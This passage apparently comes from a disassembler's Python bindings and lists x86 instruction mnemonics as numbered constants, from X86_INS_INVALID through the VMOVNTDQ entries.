X86_PREFIX_ADDRSIZE = 0x67
# X86 instructions
X86_INS_INVALID = 0
X86_INS_AAA = 1
X86_INS_AAD = 2
X86_INS_AAM = 3
X86_INS_AAS = 4
X86_INS_FABS = 5
X86_INS_ADC = 6
X86_INS_ADCX = 7
X86_INS_ADD = 8
X86_INS_ADDPD = 9
X86_INS_ADDPS = 10
X86_INS_ADDSD = 11
X86_INS_ADDSS = 12
X86_INS_ADDSUBPD = 13
X86_INS_ADDSUBPS = 14
X86_INS_FADD = 15
X86_INS_FIADD = 16
X86_INS_FADDP = 17
X86_INS_ADOX = 18
X86_INS_AESDECLAST = 19
X86_INS_AESDEC = 20
X86_INS_AESENCLAST = 21
X86_INS_AESENC = 22
X86_INS_AESIMC = 23
X86_INS_AESKEYGENASSIST = 24
X86_INS_AND = 25
X86_INS_ANDN = 26
X86_INS_ANDNPD = 27
X86_INS_ANDNPS = 28
X86_INS_ANDPD = 29
X86_INS_ANDPS = 30
X86_INS_ARPL = 31
X86_INS_BEXTR = 32
X86_INS_BLCFILL = 33
X86_INS_BLCI = 34
X86_INS_BLCIC = 35
X86_INS_BLCMSK = 36
X86_INS_BLCS = 37
X86_INS_BLENDPD = 38
X86_INS_BLENDPS = 39
X86_INS_BLENDVPD = 40
X86_INS_BLENDVPS = 41
X86_INS_BLSFILL = 42
X86_INS_BLSI = 43
X86_INS_BLSIC = 44
X86_INS_BLSMSK = 45
X86_INS_BLSR = 46
X86_INS_BOUND = 47
X86_INS_BSF = 48
X86_INS_BSR = 49
X86_INS_BSWAP = 50
X86_INS_BT = 51
X86_INS_BTC = 52
X86_INS_BTR = 53
X86_INS_BTS = 54
X86_INS_BZHI = 55
X86_INS_CALL = 56
X86_INS_CBW = 57
X86_INS_CDQ = 58
X86_INS_CDQE = 59
X86_INS_FCHS = 60
X86_INS_CLAC = 61
X86_INS_CLC = 62
X86_INS_CLD = 63
X86_INS_CLFLUSH = 64
X86_INS_CLGI = 65
X86_INS_CLI = 66
X86_INS_CLTS = 67
X86_INS_CMC = 68
X86_INS_CMOVA = 69
X86_INS_CMOVAE = 70
X86_INS_CMOVB = 71
X86_INS_CMOVBE = 72
X86_INS_FCMOVBE = 73
X86_INS_FCMOVB = 74
X86_INS_CMOVE = 75
X86_INS_FCMOVE = 76
X86_INS_CMOVG = 77
X86_INS_CMOVGE = 78
X86_INS_CMOVL = 79
X86_INS_CMOVLE = 80
X86_INS_FCMOVNBE = 81
X86_INS_FCMOVNB = 82
X86_INS_CMOVNE = 83
X86_INS_FCMOVNE = 84
X86_INS_CMOVNO = 85
X86_INS_CMOVNP = 86
X86_INS_FCMOVNU = 87
X86_INS_CMOVNS = 88
X86_INS_CMOVO = 89
X86_INS_CMOVP = 90
X86_INS_FCMOVU = 91
X86_INS_CMOVS = 92
X86_INS_CMP = 93
X86_INS_CMPPD = 94
X86_INS_CMPPS = 95
X86_INS_CMPSB = 96
X86_INS_CMPSD = 97
X86_INS_CMPSQ = 98
X86_INS_CMPSS = 99
X86_INS_CMPSW = 100
X86_INS_CMPXCHG16B = 101
X86_INS_CMPXCHG = 102
X86_INS_CMPXCHG8B = 103
X86_INS_COMISD = 104
X86_INS_COMISS = 105
X86_INS_FCOMP = 106
X86_INS_FCOMPI = 107
X86_INS_FCOMI = 108
X86_INS_FCOM = 109
X86_INS_FCOS = 110
X86_INS_CPUID = 111
X86_INS_CQO = 112
X86_INS_CRC32 = 113
X86_INS_CVTDQ2PD = 114
X86_INS_CVTDQ2PS = 115
X86_INS_CVTPD2DQ = 116
X86_INS_CVTPD2PS = 117
X86_INS_CVTPS2DQ = 118
X86_INS_CVTPS2PD = 119
X86_INS_CVTSD2SI = 120
X86_INS_CVTSD2SS = 121
X86_INS_CVTSI2SD = 122
X86_INS_CVTSI2SS = 123
X86_INS_CVTSS2SD = 124
X86_INS_CVTSS2SI = 125
X86_INS_CVTTPD2DQ = 126
X86_INS_CVTTPS2DQ = 127
X86_INS_CVTTSD2SI = 128
X86_INS_CVTTSS2SI = 129
X86_INS_CWD = 130
X86_INS_CWDE = 131
X86_INS_DAA = 132
X86_INS_DAS = 133
X86_INS_DATA16 = 134
X86_INS_DEC = 135
X86_INS_DIV = 136
X86_INS_DIVPD = 137
X86_INS_DIVPS = 138
X86_INS_FDIVR = 139
X86_INS_FIDIVR = 140
X86_INS_FDIVRP = 141
X86_INS_DIVSD = 142
X86_INS_DIVSS = 143
X86_INS_FDIV = 144
X86_INS_FIDIV = 145
X86_INS_FDIVP = 146
X86_INS_DPPD = 147
X86_INS_DPPS = 148
X86_INS_RET = 149
X86_INS_ENCLS = 150
X86_INS_ENCLU = 151
X86_INS_ENTER = 152
X86_INS_EXTRACTPS = 153
X86_INS_EXTRQ = 154
X86_INS_F2XM1 = 155
X86_INS_LCALL = 156
X86_INS_LJMP = 157
X86_INS_FBLD = 158
X86_INS_FBSTP = 159
X86_INS_FCOMPP = 160
X86_INS_FDECSTP = 161
X86_INS_FEMMS = 162
X86_INS_FFREE = 163
X86_INS_FICOM = 164
X86_INS_FICOMP = 165
X86_INS_FINCSTP = 166
X86_INS_FLDCW = 167
X86_INS_FLDENV = 168
X86_INS_FLDL2E = 169
X86_INS_FLDL2T = 170
X86_INS_FLDLG2 = 171
X86_INS_FLDLN2 = 172
X86_INS_FLDPI = 173
X86_INS_FNCLEX = 174
X86_INS_FNINIT = 175
X86_INS_FNOP = 176
X86_INS_FNSTCW = 177
X86_INS_FNSTSW = 178
X86_INS_FPATAN = 179
X86_INS_FPREM = 180
X86_INS_FPREM1 = 181
X86_INS_FPTAN = 182
X86_INS_FRNDINT = 183
X86_INS_FRSTOR = 184
X86_INS_FNSAVE = 185
X86_INS_FSCALE = 186
X86_INS_FSETPM = 187
X86_INS_FSINCOS = 188
X86_INS_FNSTENV = 189
X86_INS_FXAM = 190
X86_INS_FXRSTOR = 191
X86_INS_FXRSTOR64 = 192
X86_INS_FXSAVE = 193
X86_INS_FXSAVE64 = 194
X86_INS_FXTRACT = 195
X86_INS_FYL2X = 196
X86_INS_FYL2XP1 = 197
X86_INS_MOVAPD = 198
X86_INS_MOVAPS = 199
X86_INS_ORPD = 200
X86_INS_ORPS = 201
X86_INS_VMOVAPD = 202
X86_INS_VMOVAPS = 203
X86_INS_XORPD = 204
X86_INS_XORPS = 205
X86_INS_GETSEC = 206
X86_INS_HADDPD = 207
X86_INS_HADDPS = 208
X86_INS_HLT = 209
X86_INS_HSUBPD = 210
X86_INS_HSUBPS = 211
X86_INS_IDIV = 212
X86_INS_FILD = 213
X86_INS_IMUL = 214
X86_INS_IN = 215
X86_INS_INC = 216
X86_INS_INSB = 217
X86_INS_INSERTPS = 218
X86_INS_INSERTQ = 219
X86_INS_INSD = 220
X86_INS_INSW = 221
X86_INS_INT = 222
X86_INS_INT1 = 223
X86_INS_INT3 = 224
X86_INS_INTO = 225
X86_INS_INVD = 226
X86_INS_INVEPT = 227
X86_INS_INVLPG = 228
X86_INS_INVLPGA = 229
X86_INS_INVPCID = 230
X86_INS_INVVPID = 231
X86_INS_IRET = 232
X86_INS_IRETD = 233
X86_INS_IRETQ = 234
X86_INS_FISTTP = 235
X86_INS_FIST = 236
X86_INS_FISTP = 237
X86_INS_UCOMISD = 238
X86_INS_UCOMISS = 239
X86_INS_VCMP = 240
X86_INS_VCOMISD = 241
X86_INS_VCOMISS = 242
X86_INS_VCVTSD2SS = 243
X86_INS_VCVTSI2SD = 244
X86_INS_VCVTSI2SS = 245
X86_INS_VCVTSS2SD = 246
X86_INS_VCVTTSD2SI = 247
X86_INS_VCVTTSD2USI = 248
X86_INS_VCVTTSS2SI = 249
X86_INS_VCVTTSS2USI = 250
X86_INS_VCVTUSI2SD = 251
X86_INS_VCVTUSI2SS = 252
X86_INS_VUCOMISD = 253
X86_INS_VUCOMISS = 254
X86_INS_JAE = 255
X86_INS_JA = 256
X86_INS_JBE = 257
X86_INS_JB = 258
X86_INS_JCXZ = 259
X86_INS_JECXZ = 260
X86_INS_JE = 261
X86_INS_JGE = 262
X86_INS_JG = 263
X86_INS_JLE = 264
X86_INS_JL = 265
X86_INS_JMP = 266
X86_INS_JNE = 267
X86_INS_JNO = 268
X86_INS_JNP = 269
X86_INS_JNS = 270
X86_INS_JO = 271
X86_INS_JP = 272
X86_INS_JRCXZ = 273
X86_INS_JS = 274
X86_INS_KANDB = 275
X86_INS_KANDD = 276
X86_INS_KANDNB = 277
X86_INS_KANDND = 278
X86_INS_KANDNQ = 279
X86_INS_KANDNW = 280
X86_INS_KANDQ = 281
X86_INS_KANDW = 282
X86_INS_KMOVB = 283
X86_INS_KMOVD = 284
X86_INS_KMOVQ = 285
X86_INS_KMOVW = 286
X86_INS_KNOTB = 287
X86_INS_KNOTD = 288
X86_INS_KNOTQ = 289
X86_INS_KNOTW = 290
X86_INS_KORB = 291
X86_INS_KORD = 292
X86_INS_KORQ = 293
X86_INS_KORTESTW = 294
X86_INS_KORW = 295
X86_INS_KSHIFTLW = 296
X86_INS_KSHIFTRW = 297
X86_INS_KUNPCKBW = 298
X86_INS_KXNORB = 299
X86_INS_KXNORD = 300
X86_INS_KXNORQ = 301
X86_INS_KXNORW = 302
X86_INS_KXORB = 303
X86_INS_KXORD = 304
X86_INS_KXORQ = 305
X86_INS_KXORW = 306
X86_INS_LAHF = 307
X86_INS_LAR = 308
X86_INS_LDDQU = 309
X86_INS_LDMXCSR = 310
X86_INS_LDS = 311
X86_INS_FLDZ = 312
X86_INS_FLD1 = 313
X86_INS_FLD = 314
X86_INS_LEA = 315
X86_INS_LEAVE = 316
X86_INS_LES = 317
X86_INS_LFENCE = 318
X86_INS_LFS = 319
X86_INS_LGDT = 320
X86_INS_LGS = 321
X86_INS_LIDT = 322
X86_INS_LLDT = 323
X86_INS_LMSW = 324
X86_INS_OR = 325
X86_INS_SUB = 326
X86_INS_XOR = 327
X86_INS_LODSB = 328
X86_INS_LODSD = 329
X86_INS_LODSQ = 330
X86_INS_LODSW = 331
X86_INS_LOOP = 332
X86_INS_LOOPE = 333
X86_INS_LOOPNE = 334
X86_INS_RETF = 335
X86_INS_RETFQ = 336
X86_INS_LSL = 337
X86_INS_LSS = 338
X86_INS_LTR = 339
X86_INS_XADD = 340
X86_INS_LZCNT = 341
X86_INS_MASKMOVDQU = 342
X86_INS_MAXPD = 343
X86_INS_MAXPS = 344
X86_INS_MAXSD = 345
X86_INS_MAXSS = 346
X86_INS_MFENCE = 347
X86_INS_MINPD = 348
X86_INS_MINPS = 349
X86_INS_MINSD = 350
X86_INS_MINSS = 351
X86_INS_CVTPD2PI = 352
X86_INS_CVTPI2PD = 353
X86_INS_CVTPI2PS = 354
X86_INS_CVTPS2PI = 355
X86_INS_CVTTPD2PI = 356
X86_INS_CVTTPS2PI = 357
X86_INS_EMMS = 358
X86_INS_MASKMOVQ = 359
X86_INS_MOVD = 360
X86_INS_MOVDQ2Q = 361
X86_INS_MOVNTQ = 362
X86_INS_MOVQ2DQ = 363
X86_INS_MOVQ = 364
X86_INS_PABSB = 365
X86_INS_PABSD = 366
X86_INS_PABSW = 367
X86_INS_PACKSSDW = 368
X86_INS_PACKSSWB = 369
X86_INS_PACKUSWB = 370
X86_INS_PADDB = 371
X86_INS_PADDD = 372
X86_INS_PADDQ = 373
X86_INS_PADDSB = 374
X86_INS_PADDSW = 375
X86_INS_PADDUSB = 376
X86_INS_PADDUSW = 377
X86_INS_PADDW = 378
X86_INS_PALIGNR = 379
X86_INS_PANDN = 380
X86_INS_PAND = 381
X86_INS_PAVGB = 382
X86_INS_PAVGW = 383
X86_INS_PCMPEQB = 384
X86_INS_PCMPEQD = 385
X86_INS_PCMPEQW = 386
X86_INS_PCMPGTB = 387
X86_INS_PCMPGTD = 388
X86_INS_PCMPGTW = 389
X86_INS_PEXTRW = 390
X86_INS_PHADDSW = 391
X86_INS_PHADDW = 392
X86_INS_PHADDD = 393
X86_INS_PHSUBD = 394
X86_INS_PHSUBSW = 395
X86_INS_PHSUBW = 396
X86_INS_PINSRW = 397
X86_INS_PMADDUBSW = 398
X86_INS_PMADDWD = 399
X86_INS_PMAXSW = 400
X86_INS_PMAXUB = 401
X86_INS_PMINSW = 402
X86_INS_PMINUB = 403
X86_INS_PMOVMSKB = 404
X86_INS_PMULHRSW = 405
X86_INS_PMULHUW = 406
X86_INS_PMULHW = 407
X86_INS_PMULLW = 408
X86_INS_PMULUDQ = 409
X86_INS_POR = 410
X86_INS_PSADBW = 411
X86_INS_PSHUFB = 412
X86_INS_PSHUFW = 413
X86_INS_PSIGNB = 414
X86_INS_PSIGND = 415
X86_INS_PSIGNW = 416
X86_INS_PSLLD = 417
X86_INS_PSLLQ = 418
X86_INS_PSLLW = 419
X86_INS_PSRAD = 420
X86_INS_PSRAW = 421
X86_INS_PSRLD = 422
X86_INS_PSRLQ = 423
X86_INS_PSRLW = 424
X86_INS_PSUBB = 425
X86_INS_PSUBD = 426
X86_INS_PSUBQ = 427
X86_INS_PSUBSB = 428
X86_INS_PSUBSW = 429
X86_INS_PSUBUSB = 430
X86_INS_PSUBUSW = 431
X86_INS_PSUBW = 432
X86_INS_PUNPCKHBW = 433
X86_INS_PUNPCKHDQ = 434
X86_INS_PUNPCKHWD = 435
X86_INS_PUNPCKLBW = 436
X86_INS_PUNPCKLDQ = 437
X86_INS_PUNPCKLWD = 438
X86_INS_PXOR = 439
X86_INS_MONITOR = 440
X86_INS_MONTMUL = 441
X86_INS_MOV = 442
X86_INS_MOVABS = 443
X86_INS_MOVBE = 444
X86_INS_MOVDDUP = 445
X86_INS_MOVDQA = 446
X86_INS_MOVDQU = 447
X86_INS_MOVHLPS = 448
X86_INS_MOVHPD = 449
X86_INS_MOVHPS = 450
X86_INS_MOVLHPS = 451
X86_INS_MOVLPD = 452
X86_INS_MOVLPS = 453
X86_INS_MOVMSKPD = 454
X86_INS_MOVMSKPS = 455
X86_INS_MOVNTDQA = 456
X86_INS_MOVNTDQ = 457
X86_INS_MOVNTI = 458
X86_INS_MOVNTPD = 459
X86_INS_MOVNTPS = 460
X86_INS_MOVNTSD = 461
X86_INS_MOVNTSS = 462
X86_INS_MOVSB = 463
X86_INS_MOVSD = 464
X86_INS_MOVSHDUP = 465
X86_INS_MOVSLDUP = 466
X86_INS_MOVSQ = 467
X86_INS_MOVSS = 468
X86_INS_MOVSW = 469
X86_INS_MOVSX = 470
X86_INS_MOVSXD = 471
X86_INS_MOVUPD = 472
X86_INS_MOVUPS = 473
X86_INS_MOVZX = 474
X86_INS_MPSADBW = 475
X86_INS_MUL = 476
X86_INS_MULPD = 477
X86_INS_MULPS = 478
X86_INS_MULSD = 479
X86_INS_MULSS = 480
X86_INS_MULX = 481
X86_INS_FMUL = 482
X86_INS_FIMUL = 483
X86_INS_FMULP = 484
X86_INS_MWAIT = 485
X86_INS_NEG = 486
X86_INS_NOP = 487
X86_INS_NOT = 488
X86_INS_OUT = 489
X86_INS_OUTSB = 490
X86_INS_OUTSD = 491
X86_INS_OUTSW = 492
X86_INS_PACKUSDW = 493
X86_INS_PAUSE = 494
X86_INS_PAVGUSB = 495
X86_INS_PBLENDVB = 496
X86_INS_PBLENDW = 497
X86_INS_PCLMULQDQ = 498
X86_INS_PCMPEQQ = 499
X86_INS_PCMPESTRI = 500
X86_INS_PCMPESTRM = 501
X86_INS_PCMPGTQ = 502
X86_INS_PCMPISTRI = 503
X86_INS_PCMPISTRM = 504
X86_INS_PDEP = 505
X86_INS_PEXT = 506
X86_INS_PEXTRB = 507
X86_INS_PEXTRD = 508
X86_INS_PEXTRQ = 509
X86_INS_PF2ID = 510
X86_INS_PF2IW = 511
X86_INS_PFACC = 512
X86_INS_PFADD = 513
X86_INS_PFCMPEQ = 514
X86_INS_PFCMPGE = 515
X86_INS_PFCMPGT = 516
X86_INS_PFMAX = 517
X86_INS_PFMIN = 518
X86_INS_PFMUL = 519
X86_INS_PFNACC = 520
X86_INS_PFPNACC = 521
X86_INS_PFRCPIT1 = 522
X86_INS_PFRCPIT2 = 523
X86_INS_PFRCP = 524
X86_INS_PFRSQIT1 = 525
X86_INS_PFRSQRT = 526
X86_INS_PFSUBR = 527
X86_INS_PFSUB = 528
X86_INS_PHMINPOSUW = 529
X86_INS_PI2FD = 530
X86_INS_PI2FW = 531
X86_INS_PINSRB = 532
X86_INS_PINSRD = 533
X86_INS_PINSRQ = 534
X86_INS_PMAXSB = 535
X86_INS_PMAXSD = 536
X86_INS_PMAXUD = 537
X86_INS_PMAXUW = 538
X86_INS_PMINSB = 539
X86_INS_PMINSD = 540
X86_INS_PMINUD = 541
X86_INS_PMINUW = 542
X86_INS_PMOVSXBD = 543
X86_INS_PMOVSXBQ = 544
X86_INS_PMOVSXBW = 545
X86_INS_PMOVSXDQ = 546
X86_INS_PMOVSXWD = 547
X86_INS_PMOVSXWQ = 548
X86_INS_PMOVZXBD = 549
X86_INS_PMOVZXBQ = 550
X86_INS_PMOVZXBW = 551
X86_INS_PMOVZXDQ = 552
X86_INS_PMOVZXWD = 553
X86_INS_PMOVZXWQ = 554
X86_INS_PMULDQ = 555
X86_INS_PMULHRW = 556
X86_INS_PMULLD = 557
X86_INS_POP = 558
X86_INS_POPAW = 559
X86_INS_POPAL = 560
X86_INS_POPCNT = 561
X86_INS_POPF = 562
X86_INS_POPFD = 563
X86_INS_POPFQ = 564
X86_INS_PREFETCH = 565
X86_INS_PREFETCHNTA = 566
X86_INS_PREFETCHT0 = 567
X86_INS_PREFETCHT1 = 568
X86_INS_PREFETCHT2 = 569
X86_INS_PREFETCHW = 570
X86_INS_PSHUFD = 571
X86_INS_PSHUFHW = 572
X86_INS_PSHUFLW = 573
X86_INS_PSLLDQ = 574
X86_INS_PSRLDQ = 575
X86_INS_PSWAPD = 576
X86_INS_PTEST = 577
X86_INS_PUNPCKHQDQ = 578
X86_INS_PUNPCKLQDQ = 579
X86_INS_PUSH = 580
X86_INS_PUSHAW = 581
X86_INS_PUSHAL = 582
X86_INS_PUSHF = 583
X86_INS_PUSHFD = 584
X86_INS_PUSHFQ = 585
X86_INS_RCL = 586
X86_INS_RCPPS = 587
X86_INS_RCPSS = 588
X86_INS_RCR = 589
X86_INS_RDFSBASE = 590
X86_INS_RDGSBASE = 591
X86_INS_RDMSR = 592
X86_INS_RDPMC = 593
X86_INS_RDRAND = 594
X86_INS_RDSEED = 595
X86_INS_RDTSC = 596
X86_INS_RDTSCP = 597
X86_INS_ROL = 598
X86_INS_ROR = 599
X86_INS_RORX = 600
X86_INS_ROUNDPD = 601
X86_INS_ROUNDPS = 602
X86_INS_ROUNDSD = 603
X86_INS_ROUNDSS = 604
X86_INS_RSM = 605
X86_INS_RSQRTPS = 606
X86_INS_RSQRTSS = 607
X86_INS_SAHF = 608
X86_INS_SAL = 609
X86_INS_SALC = 610
X86_INS_SAR = 611
X86_INS_SARX = 612
X86_INS_SBB = 613
X86_INS_SCASB = 614
X86_INS_SCASD = 615
X86_INS_SCASQ = 616
X86_INS_SCASW = 617
X86_INS_SETAE = 618
X86_INS_SETA = 619
X86_INS_SETBE = 620
X86_INS_SETB = 621
X86_INS_SETE = 622
X86_INS_SETGE = 623
X86_INS_SETG = 624
X86_INS_SETLE = 625
X86_INS_SETL = 626
X86_INS_SETNE = 627
X86_INS_SETNO = 628
X86_INS_SETNP = 629
X86_INS_SETNS = 630
X86_INS_SETO = 631
X86_INS_SETP = 632
X86_INS_SETS = 633
X86_INS_SFENCE = 634
X86_INS_SGDT = 635
X86_INS_SHA1MSG1 = 636
X86_INS_SHA1MSG2 = 637
X86_INS_SHA1NEXTE = 638
X86_INS_SHA1RNDS4 = 639
X86_INS_SHA256MSG1 = 640
X86_INS_SHA256MSG2 = 641
X86_INS_SHA256RNDS2 = 642
X86_INS_SHL = 643
X86_INS_SHLD = 644
X86_INS_SHLX = 645
X86_INS_SHR = 646
X86_INS_SHRD = 647
X86_INS_SHRX = 648
X86_INS_SHUFPD = 649
X86_INS_SHUFPS = 650
X86_INS_SIDT = 651
X86_INS_FSIN = 652
X86_INS_SKINIT = 653
X86_INS_SLDT = 654
X86_INS_SMSW = 655
X86_INS_SQRTPD = 656
X86_INS_SQRTPS = 657
X86_INS_SQRTSD = 658
X86_INS_SQRTSS = 659
X86_INS_FSQRT = 660
X86_INS_STAC = 661
X86_INS_STC = 662
X86_INS_STD = 663
X86_INS_STGI = 664
X86_INS_STI = 665
X86_INS_STMXCSR = 666
X86_INS_STOSB = 667
X86_INS_STOSD = 668
X86_INS_STOSQ = 669
X86_INS_STOSW = 670
X86_INS_STR = 671
X86_INS_FST = 672
X86_INS_FSTP = 673
X86_INS_FSTPNCE = 674
X86_INS_SUBPD = 675
X86_INS_SUBPS = 676
X86_INS_FSUBR = 677
X86_INS_FISUBR = 678
X86_INS_FSUBRP = 679
X86_INS_SUBSD = 680
X86_INS_SUBSS = 681
X86_INS_FSUB = 682
X86_INS_FISUB = 683
X86_INS_FSUBP = 684
X86_INS_SWAPGS = 685
X86_INS_SYSCALL = 686
X86_INS_SYSENTER = 687
X86_INS_SYSEXIT = 688
X86_INS_SYSRET = 689
X86_INS_T1MSKC = 690
X86_INS_TEST = 691
X86_INS_UD2 = 692
X86_INS_FTST = 693
X86_INS_TZCNT = 694
X86_INS_TZMSK = 695
X86_INS_FUCOMPI = 696
X86_INS_FUCOMI = 697
X86_INS_FUCOMPP = 698
X86_INS_FUCOMP = 699
X86_INS_FUCOM = 700
X86_INS_UD2B = 701
X86_INS_UNPCKHPD = 702
X86_INS_UNPCKHPS = 703
X86_INS_UNPCKLPD = 704
X86_INS_UNPCKLPS = 705
X86_INS_VADDPD = 706
X86_INS_VADDPS = 707
X86_INS_VADDSD = 708
X86_INS_VADDSS = 709
X86_INS_VADDSUBPD = 710
X86_INS_VADDSUBPS = 711
X86_INS_VAESDECLAST = 712
X86_INS_VAESDEC = 713
X86_INS_VAESENCLAST = 714
X86_INS_VAESENC = 715
X86_INS_VAESIMC = 716
X86_INS_VAESKEYGENASSIST = 717
X86_INS_VALIGND = 718
X86_INS_VALIGNQ = 719
X86_INS_VANDNPD = 720
X86_INS_VANDNPS = 721
X86_INS_VANDPD = 722
X86_INS_VANDPS = 723
X86_INS_VBLENDMPD = 724
X86_INS_VBLENDMPS = 725
X86_INS_VBLENDPD = 726
X86_INS_VBLENDPS = 727
X86_INS_VBLENDVPD = 728
X86_INS_VBLENDVPS = 729
X86_INS_VBROADCASTF128 = 730
X86_INS_VBROADCASTI128 = 731
X86_INS_VBROADCASTI32X4 = 732
X86_INS_VBROADCASTI64X4 = 733
X86_INS_VBROADCASTSD = 734
X86_INS_VBROADCASTSS = 735
X86_INS_VCMPPD = 736
X86_INS_VCMPPS = 737
X86_INS_VCMPSD = 738
X86_INS_VCMPSS = 739
X86_INS_VCVTDQ2PD = 740
X86_INS_VCVTDQ2PS = 741
X86_INS_VCVTPD2DQX = 742
X86_INS_VCVTPD2DQ = 743
X86_INS_VCVTPD2PSX = 744
X86_INS_VCVTPD2PS = 745
X86_INS_VCVTPD2UDQ = 746
X86_INS_VCVTPH2PS = 747
X86_INS_VCVTPS2DQ = 748
X86_INS_VCVTPS2PD = 749
X86_INS_VCVTPS2PH = 750
X86_INS_VCVTPS2UDQ = 751
X86_INS_VCVTSD2SI = 752
X86_INS_VCVTSD2USI = 753
X86_INS_VCVTSS2SI = 754
X86_INS_VCVTSS2USI = 755
X86_INS_VCVTTPD2DQX = 756
X86_INS_VCVTTPD2DQ = 757
X86_INS_VCVTTPD2UDQ = 758
X86_INS_VCVTTPS2DQ = 759
X86_INS_VCVTTPS2UDQ = 760
X86_INS_VCVTUDQ2PD = 761
X86_INS_VCVTUDQ2PS = 762
X86_INS_VDIVPD = 763
X86_INS_VDIVPS = 764
X86_INS_VDIVSD = 765
X86_INS_VDIVSS = 766
X86_INS_VDPPD = 767
X86_INS_VDPPS = 768
X86_INS_VERR = 769
X86_INS_VERW = 770
X86_INS_VEXTRACTF128 = 771
X86_INS_VEXTRACTF32X4 = 772
X86_INS_VEXTRACTF64X4 = 773
X86_INS_VEXTRACTI128 = 774
X86_INS_VEXTRACTI32X4 = 775
X86_INS_VEXTRACTI64X4 = 776
X86_INS_VEXTRACTPS = 777
X86_INS_VFMADD132PD = 778
X86_INS_VFMADD132PS = 779
X86_INS_VFMADD213PD = 780
X86_INS_VFMADD213PS = 781
X86_INS_VFMADDPD = 782
X86_INS_VFMADD231PD = 783
X86_INS_VFMADDPS = 784
X86_INS_VFMADD231PS = 785
X86_INS_VFMADDSD = 786
X86_INS_VFMADD213SD = 787
X86_INS_VFMADD132SD = 788
X86_INS_VFMADD231SD = 789
X86_INS_VFMADDSS = 790
X86_INS_VFMADD213SS = 791
X86_INS_VFMADD132SS = 792
X86_INS_VFMADD231SS = 793
X86_INS_VFMADDSUB132PD = 794
X86_INS_VFMADDSUB132PS = 795
X86_INS_VFMADDSUB213PD = 796
X86_INS_VFMADDSUB213PS = 797
X86_INS_VFMADDSUBPD = 798
X86_INS_VFMADDSUB231PD = 799
X86_INS_VFMADDSUBPS = 800
X86_INS_VFMADDSUB231PS = 801
X86_INS_VFMSUB132PD = 802
X86_INS_VFMSUB132PS = 803
X86_INS_VFMSUB213PD = 804
X86_INS_VFMSUB213PS = 805
X86_INS_VFMSUBADD132PD = 806
X86_INS_VFMSUBADD132PS = 807
X86_INS_VFMSUBADD213PD = 808
X86_INS_VFMSUBADD213PS = 809
X86_INS_VFMSUBADDPD = 810
X86_INS_VFMSUBADD231PD = 811
X86_INS_VFMSUBADDPS = 812
X86_INS_VFMSUBADD231PS = 813
X86_INS_VFMSUBPD = 814
X86_INS_VFMSUB231PD = 815
X86_INS_VFMSUBPS = 816
X86_INS_VFMSUB231PS = 817
X86_INS_VFMSUBSD = 818
X86_INS_VFMSUB213SD = 819
X86_INS_VFMSUB132SD = 820
X86_INS_VFMSUB231SD = 821
X86_INS_VFMSUBSS = 822
X86_INS_VFMSUB213SS = 823
X86_INS_VFMSUB132SS = 824
X86_INS_VFMSUB231SS = 825
X86_INS_VFNMADD132PD = 826
X86_INS_VFNMADD132PS = 827
X86_INS_VFNMADD213PD = 828
X86_INS_VFNMADD213PS = 829
X86_INS_VFNMADDPD = 830
X86_INS_VFNMADD231PD = 831
X86_INS_VFNMADDPS = 832
X86_INS_VFNMADD231PS = 833
X86_INS_VFNMADDSD = 834
X86_INS_VFNMADD213SD = 835
X86_INS_VFNMADD132SD = 836
X86_INS_VFNMADD231SD = 837
X86_INS_VFNMADDSS = 838
X86_INS_VFNMADD213SS = 839
X86_INS_VFNMADD132SS = 840
X86_INS_VFNMADD231SS = 841
X86_INS_VFNMSUB132PD = 842
X86_INS_VFNMSUB132PS = 843
X86_INS_VFNMSUB213PD = 844
X86_INS_VFNMSUB213PS = 845
X86_INS_VFNMSUBPD = 846
X86_INS_VFNMSUB231PD = 847
X86_INS_VFNMSUBPS = 848
X86_INS_VFNMSUB231PS = 849
X86_INS_VFNMSUBSD = 850
X86_INS_VFNMSUB213SD = 851
X86_INS_VFNMSUB132SD = 852
X86_INS_VFNMSUB231SD = 853
X86_INS_VFNMSUBSS = 854
X86_INS_VFNMSUB213SS = 855
X86_INS_VFNMSUB132SS = 856
X86_INS_VFNMSUB231SS = 857
X86_INS_VFRCZPD = 858
X86_INS_VFRCZPS = 859
X86_INS_VFRCZSD = 860
X86_INS_VFRCZSS = 861
X86_INS_VORPD = 862
X86_INS_VORPS = 863
X86_INS_VXORPD = 864
X86_INS_VXORPS = 865
X86_INS_VGATHERDPD = 866
X86_INS_VGATHERDPS = 867
X86_INS_VGATHERPF0DPD = 868
X86_INS_VGATHERPF0DPS = 869
X86_INS_VGATHERPF0QPD = 870
X86_INS_VGATHERPF0QPS = 871
X86_INS_VGATHERPF1DPD = 872
X86_INS_VGATHERPF1DPS = 873
X86_INS_VGATHERPF1QPD = 874
X86_INS_VGATHERPF1QPS = 875
X86_INS_VGATHERQPD = 876
X86_INS_VGATHERQPS = 877
X86_INS_VHADDPD = 878
X86_INS_VHADDPS = 879
X86_INS_VHSUBPD = 880
X86_INS_VHSUBPS = 881
X86_INS_VINSERTF128 = 882
X86_INS_VINSERTF32X4 = 883
X86_INS_VINSERTF64X4 = 884
X86_INS_VINSERTI128 = 885
X86_INS_VINSERTI32X4 = 886
X86_INS_VINSERTI64X4 = 887
X86_INS_VINSERTPS = 888
X86_INS_VLDDQU = 889
X86_INS_VLDMXCSR = 890
X86_INS_VMASKMOVDQU = 891
X86_INS_VMASKMOVPD = 892
X86_INS_VMASKMOVPS = 893
X86_INS_VMAXPD = 894
X86_INS_VMAXPS = 895
X86_INS_VMAXSD = 896
X86_INS_VMAXSS = 897
X86_INS_VMCALL = 898
X86_INS_VMCLEAR = 899
X86_INS_VMFUNC = 900
X86_INS_VMINPD = 901
X86_INS_VMINPS = 902
X86_INS_VMINSD = 903
X86_INS_VMINSS = 904
X86_INS_VMLAUNCH = 905
X86_INS_VMLOAD = 906
X86_INS_VMMCALL = 907
X86_INS_VMOVQ = 908
X86_INS_VMOVDDUP = 909
X86_INS_VMOVD = 910
X86_INS_VMOVDQA32 = 911
X86_INS_VMOVDQA64 = 912
X86_INS_VMOVDQA = 913
X86_INS_VMOVDQU16 = 914
X86_INS_VMOVDQU32 = 915
X86_INS_VMOVDQU64 = 916
X86_INS_VMOVDQU8 = 917
X86_INS_VMOVDQU = 918
X86_INS_VMOVHLPS = 919
X86_INS_VMOVHPD = 920
X86_INS_VMOVHPS = 921
X86_INS_VMOVLHPS = 922
X86_INS_VMOVLPD = 923
X86_INS_VMOVLPS = 924
X86_INS_VMOVMSKPD = 925
X86_INS_VMOVMSKPS = 926
X86_INS_VMOVNTDQA = 927
X86_INS_VMOVNTDQ = 928
